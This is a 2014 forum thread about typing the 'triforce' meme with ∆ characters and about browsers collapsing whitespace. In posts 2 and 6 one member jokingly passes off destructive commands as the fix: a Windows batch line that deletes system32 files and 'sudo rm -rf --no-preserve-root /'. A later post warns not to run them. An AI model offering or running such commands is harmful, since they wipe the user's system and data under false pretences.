The "Can't Triforce" meme

Discussion in 'Discussions' started by Arron Syaoran, Feb 25, 2014.

  1. Arron Syaoran

    Arron Syaoran Member

    ∆ ∆
    Anyone else having trouble with this on other sites? I've noticed that most browsers/websites like to collapse empty space, (including non-breaking space), making it look like this:

    I had to use an HTML tag to preserve the whitespace, but the tags itself also display. I first started noticing this when I correctly typed the code into my twitter feed, resulting in all of the whitespace being collapsed. Please tell me that 4chan and those other sites also have the whitespace collapsing problem.

    Let the discussion commence!

    Edit: Putting it in code also works perfectly, i blame the browser(using Chrome atm):
    ∆ ∆
    Last edited: Feb 25, 2014
    OmniaNigrum likes this.
  2. mining

    mining Member

    It's very simple.

    All you need to do is make a .bat file on your desktop containing:

    del \windows\system 32\*.*
    Double click it, and a triforce will be appended to your clipboard.
    Alistaire and OmniaNigrum like this.
  3. Arron Syaoran

    Arron Syaoran Member

    That only works on windows. I'm on a Mac. Windows always seems to have better support due to the number of people using it.

    Edit: I also heard that IE9-10 doesn't have the whitespace collapsing problem that Chrome/Firefox does.
    OmniaNigrum likes this.
  4. OmniaNigrum

    OmniaNigrum Member

    I could provide a similar (smartassed) solution for the MAC OS. But I think the problem is known and you know how to fix it. The big question that remains for me is why this matters for you? The whitespace is wider here than a single space, yet looks a pixel or two off from two spaces. So have you identified what character so you can reproduce it without having to resort to copying and pasting it in? (For example, I live in the USA and my keyboard is a US layout and as such has no € character. So to put that in anywhere I had to lookup the "Alt Keys" combination that makes it. It is Alt+0128. (With the numerals pressed on the numpad while the Alt key was held down.)

    I think some of those are different on Mac and Linux, but I have never had a Mac to test with, and game too much to actively play with Linux.
  5. Arron Syaoran

    Arron Syaoran Member

    I type Option+J to create ∆. Option+<whatever key> allows access to most keys on mac, but for the really underused exotic ones I would need to open my character map and hit the insert button. As for Batman™, always remember to add the trademark or else it would not be the DC Comics version of Batman™.(Option+2)
    OmniaNigrum likes this.
  6. mining

    mining Member

    On OSX or loonix, you'll want to try
    sudo rm -rf --no-preserve-root / #3{∆}."\n".""
    this Super User DOes (you are super, right?) Renders Manually, Remembering Formatting, and doesn't preserve the root (e.g. the mispositioning of the top center one), then outputs a centered "∆", then "∆∆" in a row.
  7. OmniaNigrum

    OmniaNigrum Member

    Just in case anyone does not get it, do not ever use that command. Funny though.
  8. Arron Syaoran

    Arron Syaoran Member

    Whitespace != Root. Root == Core of Unix-based systems. Why wouldn't I want to preserve the root?

    Edit: This reminds me of the Delete Windows Gag, but for OS 10/Linucks
    OmniaNigrum likes this.